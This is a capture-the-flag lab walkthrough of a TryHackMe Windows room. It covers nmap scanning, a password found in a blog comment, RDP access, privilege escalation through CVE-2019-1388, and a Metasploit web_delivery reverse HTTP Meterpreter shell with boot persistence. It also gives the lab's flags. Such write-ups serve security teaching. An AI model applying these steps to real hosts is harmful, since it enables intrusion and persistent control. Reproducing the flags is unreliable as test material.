Task 1 : Mission Start!
Throughout this room, we’ll be looking at alternative modes of exploitation without the use of Metasploit or really exploitation tools in general beyond nmap and dirbuster. To wrap up the room, we’ll be pivoting back to these tools for persistence and additional steps we can take. Without further delay, let’s deploy our target machine!
This room is a remix of my previous room Retro with some complications I added to that room having been removed. For increased difficulty and an exercise in patience, check that room out after this. In addition, this room is the sequel to Ice. — DarkStar7471
#1 Deploy the machine! This is a Windows box so give it a few minutes (3–5 at max) to come online.
You can deploy the machine.
Task 2 : Activate Forward Scanners and Launch Proton Torpedoes
Now that we’ve launched our target, let’s perform some basic enumeration of the services running on it!
#1 How many ports are open on our target system?
I started off with an nmap scan:
nmap -T4 -A -p- <target ip>
We can see 2 open ports 80/tcp and 3389/tcp.
ans : 2
#2 Looks like there’s a web server running, what is the title of the page we discover when browsing to it?
First I’ll head over to the webpage to check it out:
We can see title if you look visited web site. IIS Windows Server
ans : IIS Windows Server
#3 Interesting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?
We found /retro.
ans : /retro
#4 Navigate to our discovered hidden directory, what potential username do we discover?
We can search inside website.
I could only see one username “wade”.
ans : wade
#5 Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?
I went through the website and saw the password in a comment.
ans : parzival
#6 Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are it’s contents?
We used remmina to access the machine.
We find uset.txt
ans : THM{HACK_PLAYER_ONE}
Task 3 : Breaching the Control Room
Now that we’ve gained access to our target system, let’s see if we can find a way to escalate. To start, let’s scout around the system to see if we can find anything of interest.
#1 When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
I looked at the internet history searches of the system we accessed.
We find cve-2019–1388.
ans : CVE-2019–1388
#2 Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?
I found an undeleted file in the recycle bin.
ans : hhupd
#3 Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!
I researched the vulnerability.
and we find youtube video.
Show more details and show information about the publisher’s certificate.
Click the issued by.
And then exit.
After clicking, we do ctrl +s in the page that opens.
We can open cmd.
#4 Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?
We are find system info with windows command “whoami”.
ans : nt authority\system
#5 Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!
We find root.
ans : THM{COIN_OPERATED_EXPLOITATION}
Task 4 : Adoption into the Collective
Now that we’ve thoroughly compromised our target machine, let’s return to our exploitation tools so that we can gain remote shell access and persistence.
#1 Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.
#2 First, let’s set the target to PSH (PowerShell). Which target number is PSH?
We found psh by doing show targets.
ans : 2
#3 After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it’ll be running on the TryHackMe network.
set lhost my local tryhackme ip.
#4 Finally, let’s set our payload. In this case, we’ll be using a simple reverse HTTP payload. Do this now with the command: ‘set payload windows/meterpreter/reverse_http’. Following this, launch the attack as a job with the command ‘run -j’.
set payload windows/meterpreter/reverse_http
run-j
#5 Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I’ve found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won’t always work. Once you’ve run this command, return to our attacker machine and note that our reverse shell has spawned.
I convert our exploit to a text file.
I run that file on windows machine.
We provided access.
#6 Last but certainly not least, let’s look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don’t include anything beyond the base command and the option for boot startup.
We find run persistence -X.
ans : run persistence -X.
#7 Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you’ll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you’ve now gain full control over the remote host and have established persistence for further operations!
We can do whatever we want in the system.
This box was really fun! I love the ones that have a story/theme that goes along with them.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!
